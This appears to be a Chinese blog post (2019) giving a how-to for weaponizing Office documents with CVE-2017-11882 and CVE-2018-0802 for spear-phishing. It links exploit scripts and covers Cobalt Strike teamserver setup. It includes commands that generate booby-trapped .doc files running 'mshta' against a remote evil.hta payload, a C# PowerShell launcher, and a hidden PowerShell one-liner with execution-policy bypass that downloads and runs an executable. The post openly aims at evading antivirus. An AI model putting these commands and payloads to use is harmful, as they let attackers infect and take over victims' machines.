CVE-2018-0802漏洞利用

看了一天apt报告,主流利用Office鱼叉攻击的漏洞,还是这Microsoft Office CVE-2017-8570,CVE-2017-11882和CVE-2018-0802 三个而且都知道office一般都不更新,很容易打开就中。但是doc免杀比较难,很容易被杀,比如主流的mshta这种方式。

 

利用脚本:

https://github.com/denmilu/CVE-2018-0802_CVE-2017-11882     这个脚本集成了两个漏洞

https://github.com/lovehhf/WebSecurityLearn/blob/eea8e43aff/CVE/CVE-2017-11882/webdav_exec_CVE-2017-11882.py

https://github.com/rxwx/CVE-2018-0802

https://github.com/Ridter/CVE-2017-11882/

也可以使用msf模块。

 

Linux (Kali 2018.4, Ubuntu 18.04)

  1. Update APT
    sudo apt-get update
  2. Install OpenJDK 11 with APT
    sudo apt-get install openjdk-11-jdk
  3. Make OpenJDK 11 the default:
    sudo update-java-alternatives -s java-1.11.0-openjdk-amd64

Linux (Other)

    1. Uninstall the current OpenJDK package(s)
    2. Download OpenJDK for Linux/x64 at: https://jdk.java.net/11/
    3. Extract the OpenJDK binary:
      tar zxvf openjdk-11.0.1_linux-x64_bin.tar.gz
    4. Move the OpenJDK folder to /usr/local:
      mv jdk-11.0.1 /usr/local
    5. Add the following to ~/.bashrc
      JAVA_HOME="/usr/local/jdk-11.0.1" 
      PATH=$PATH:$JAVA_HOME/bin
    6. Refresh your ~/.bashrc to make the new environment variables take effect
      source ~/.bashrc

具体环境安装可以参考cobalt strike官方。https://www.cobaltstrike.com/help-java-dependency

 

chmod +x teamserver

nohup ./teamserver IP 密码 &

先使用cobalt strike 生成一个hta的payload


python webdav_exec_CVE-2017-11882.py -u http://xxxxx.xx.xxx:8001/evil.hta -e "mshta http://xxxx.x.x.x.x:8001/evil.hta" -o test.doc


python RTF_11882_0802.py -c "mshta http://xx.xxx.xx.xx:8001/evil.hta" -o test.doc

 

 

也可以参考这边文章:

http://www.sohu.com/a/222892615_609556

 

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shell
{
class Program
{
static void Main(string[] args)
{
string strCmdText;
strCmdText = "your-powershell-here";
System.Diagnostics.Process.Start("powershell.exe", strCmdText);
}
}
}

 powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://xx.xx.xx.xx.xx/notepad.exe','notepad.exe');start-process notepad.exe

posted @ 2019-06-01 09:38 轻落语 阅读(...) 评论(...) 编辑 收藏